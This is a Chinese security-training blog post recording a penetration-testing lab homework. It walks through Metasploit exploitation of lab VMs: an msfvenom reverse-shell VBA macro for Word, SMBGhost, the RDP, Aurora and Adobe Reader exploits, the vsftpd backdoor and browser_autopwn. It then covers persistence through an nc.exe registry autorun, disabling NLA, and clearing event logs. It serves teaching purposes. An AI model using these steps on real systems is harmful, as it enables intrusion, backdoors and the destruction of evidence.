统计
  • 建站日期:2021-03-10
  • 文章总数:32 篇
  • 评论总数:0 条
  • 分类总数:5 个
  • 最后更新:9月13日
文章 渗透测试

逍遥安全网络攻防实验 -- 渗透测试作业三

逍遥子
首页 渗透测试 正文


漏洞复现:

1.利用宏病毒感染word文档获取shell复现

https://www.offsec.com/metasploit-unleashed/vbscript-infection-methods/

A macro is a feature that allows users to create automated processes inside of a document used by software like Microsoft Word, Excel, or PowerPoint. This is used to enhance user experience, increase productivity, or automate otherwise manual tasks. But, in other words, it executes code. What kind of code? Well, pretty much whatever you want, even a Meterpreter session!

One memorable example of a macro-malware is the Melissa virus, which first appeared in 1999. The malware was embedded in an MS Word file and when opened, would e-mail itself to the first 50 contacts in the victim’s address book. Though it didn’t cause much damage to individual users (aside from accidentally causing several mail services to DDOS), the total worth of damages caused was estimated at 80$ million, and the attacker was sentenced to 20 months in federal prison.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.137.130 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe -o output.txt


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第1
张图片

the script is in two parts. The first part of the script is created as a macro and the second part is appended into the document text itself.

You will need to transfer this script over to a machine with Windows and Office installed .

创建宏


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第2
张图片

将生成的宏复制到此处:


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第3
张图片

将生成的第二部分即文档内容粘贴到word文档中


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第4
张图片

宏文件生成完毕

需要另存为启用宏的Word 文档


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第5
张图片

打开生成的文档,需要开启宏


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第6
张图片

设置 Metasploit 监听


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第7
张图片

成功 getshell


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第8
张图片

2.实现CVE-2020-0796永恒之黑漏洞利用

https://blog.csdn.net/weixin_63610715/article/details/133847253

https://www.cnblogs.com/kbhome/p/13073746.html

https://www.cnblogs.com/jihejihe/articles/16899783.html

原理分析:https://www.jamf.com/blog/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-poc-jamf-threat-labs/

https://github.com/jamf/CVE-2020-0796-RCE-POC

SMB远程代码执行漏洞(CVE-2020-0796)

该漏洞由SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,没有检查长度是否合法,最终导致整数溢出,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码,攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

环境:

攻击方kali:192.168.137.130

受害机win10: 192.168.137.133

端口扫描,开放445端口,提供smb服务


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第9
张图片

检测是否存在漏洞:

工具下载地址:https://github.com/eerykitty/CVE-2020-0796-PoC


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第10
张图片


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第11
张图片

识别目标主机的smb版本 use auxiliary/scanner/smb/smb_version


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第12
张图片


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第13
张图片


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第14
张图片

加载模块


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第15
张图片


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第16
张图片

添加丢失文件 # unzip external.zip -d /usr/share/metasploit-framework/


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第17
张图片

后渗透维持权限

后渗透的目的是长久保持对目标的权限,主要手段是植入后门

background : 把当前连接保存到后台不退出连接

加载后渗透模块enable_rdp 创建目标主机RDP用户


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第18
张图片

如果目标主机开启NLA,建立的RDP账号将不能通过RDP连接到目标主机

查询目标机注册表来确定是否开启了 NLA。


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第19
张图片

根据查询结果 SecurityLayer(2 )和 UserAuthentication (1)的值,可以知道目标机开启了 NLA以上说明目标主机上的NLA(网络级身份验证)处在开启状态,不能够直接用rdp连接目标主机。

reg -h # 查看帮助

-k #注册表的路径 -v 键的名称 -d 键值

reg enumkey [-k <key>] # 枚举注册表的内容

reg createkey [-k <key>] # 创建注册表项

reg deletekey [-k <key>] # 删除注册表项

reg setval [-k <key> -v <val> -d <data>] # 在注册表里添加内容

reg deleteval [-k <key> -v <val>] # 删除注册表的值

reg queryval [-k <key> -v <val>] # 查询注册表的值

通过修改注册表将 SecurityLayer 和 UserAuthentication 的值修改为 0,就可以关闭NLA。


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第20
张图片

rdesktop 192.168.1.60 -u test -p 123456 建立 rdp 连接


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第21
张图片

远程桌面连接成功


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第22
张图片

修改注册表启动项长久维持权限

直接利用漏洞获取目标权限不稳定,为长久的获取目标主机的权限,需要通过植入后门来实现。

通过已获取的权限上传后门

后门可以是MSF生成的,甚至可以是勒索病毒。这里使用nc.exe作为后门

nc 参数解释:

L 用户退出后重新进行端口侦听

d 后台运行

p 指定端口

-e 连接后执行的程序

在kali主机上利用已经获取的shell上传nc.exe

注册表添加启动项执行 nc 反弹 shell 命令

运行shell,执行windows命令修改防火墙


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第23
张图片

重启win10,kali开一个新终端:

检查端口开放,443处于监听状态


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第24
张图片

成功获得 shell


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第25
张图片

上传木马后让木马自动运行的方式:注册表自启动项、添加计划任务、注入到常用的exe文件等等

删除 windows 日志

eventvwr.exe


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第26
张图片

删除日志:

一是在获取权限后直接使用meterpreter的删除日志命令:clearv

二是利用专门编写的删除windows日志文件的批处理文件删除日志

查杀木马

检查可疑连接端口及进程


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第27
张图片

查找进程对应的程序名称 ,删除木马文件

tasklist |findstr <PID> , taskkill /PID <PID>


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第28
张图片

3.实现Microsoft Windows远程溢出漏洞CVE-2012-0002利用

漏洞针对 win7、windows XP, windows server 2008 等系统的3389远程桌面服务(RDP)

win7 开启远程桌面设置
逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第29
张图片

services.msc
逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第30
张图片

网络信息

  • win7 ip:192.168.137.129
  • Kali ip:192.168.137.130

搜索对应活跃主机win7蓝屏漏洞端口

nmap 扫描win7端口
逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第31
张图片

Nessus 执行漏洞扫描

/bin/systemctl start nessusd.service
逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第32
张图片

msfconsole 加载攻击模块
逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第33
张图片
逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第34
张图片
逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第35
张图片

攻击成功
逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第36
张图片

4.实现MS11-003(CVE-2001-0036)漏洞利用

MS11-003 漏洞主要影响以下 Windows 服务:

  • Remote Procedure Call (RPC):该漏洞涉及 RPC 服务的实现。RPC 是 Windows 系统中用于进程间通信的核心组件。
  • Server Message Block (SMB):该协议用于文件共享和打印服务,漏洞可能通过 SMB 实现的 RPC 连接进行利用。

msfconsole查找攻击模块


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第37
张图片

run 开始攻击


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第38
张图片

生成恶意网站server 地址:http://192.168.137.130:8080/DuUOHssks2, win7 虚拟机 通过IE浏览器访问上述恶意网站


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第39
张图片

成功 getshell

5.实现IE浏览器的极光漏洞利用

https://hstar.me/2019/06/aurora-analysis-2/

https://hstar.me/2019/06/aurora-analysis-1/

https://bbs.kanxue.com/thread-247763-1.htm

查找极光漏洞攻击模块


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第40
张图片

恶意网址:http://192.168.137.130:8080/L8XkQqOqMeLl


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第41
张图片

win7 访问恶意网址:


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第42
张图片

成功getshell


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第43
张图片

6.实现Adobe Reader 9漏洞利用

加载攻击模块


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第44
张图片

加载监听模块


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第45
张图片

成功getshell


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第46
张图片

7.渗透攻击Metasploitable的Vsftpd源码包后门漏洞

加载攻击模块


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第47
张图片

getshell


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第48
张图片

8.使用browser_autopwn 模块渗透攻击浏览器

Browser Autopwn 是由Metasploit提供的一个辅助模块。
当访问一个Web页面时,它允许用户自动地攻击一个入侵主机。


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第49
张图片

生成恶意网址


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第50
张图片

受害机访问恶意网站后,开始攻击


逍遥安全网络攻防实验--渗透测试作业三
-逍遥安全团队-网络安全培训-WEB安全培训-WEB渗透测试培训
-第51
张图片














扫描二维码,在手机上阅读


    版权说明
    文章采用: 《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权。
    版权声明:未标注转载均为本站原创,转载时请以链接形式注明文章出处。如有侵权、不妥之处,请联系站长删除。敬请谅解!

    -- 展开阅读全文 --
    逍遥安全团队渗透测试ARP欺骗
    « 上一篇
    逍遥安全网络攻防实验 -- 渗透测试作业二
    下一篇 »
    为了防止灌水评论,登录后即可评论!

    HI ! 请登录
    注册会员,享受下载全站资源特权。

    最新评论

    标签

    热门文章

    最新文章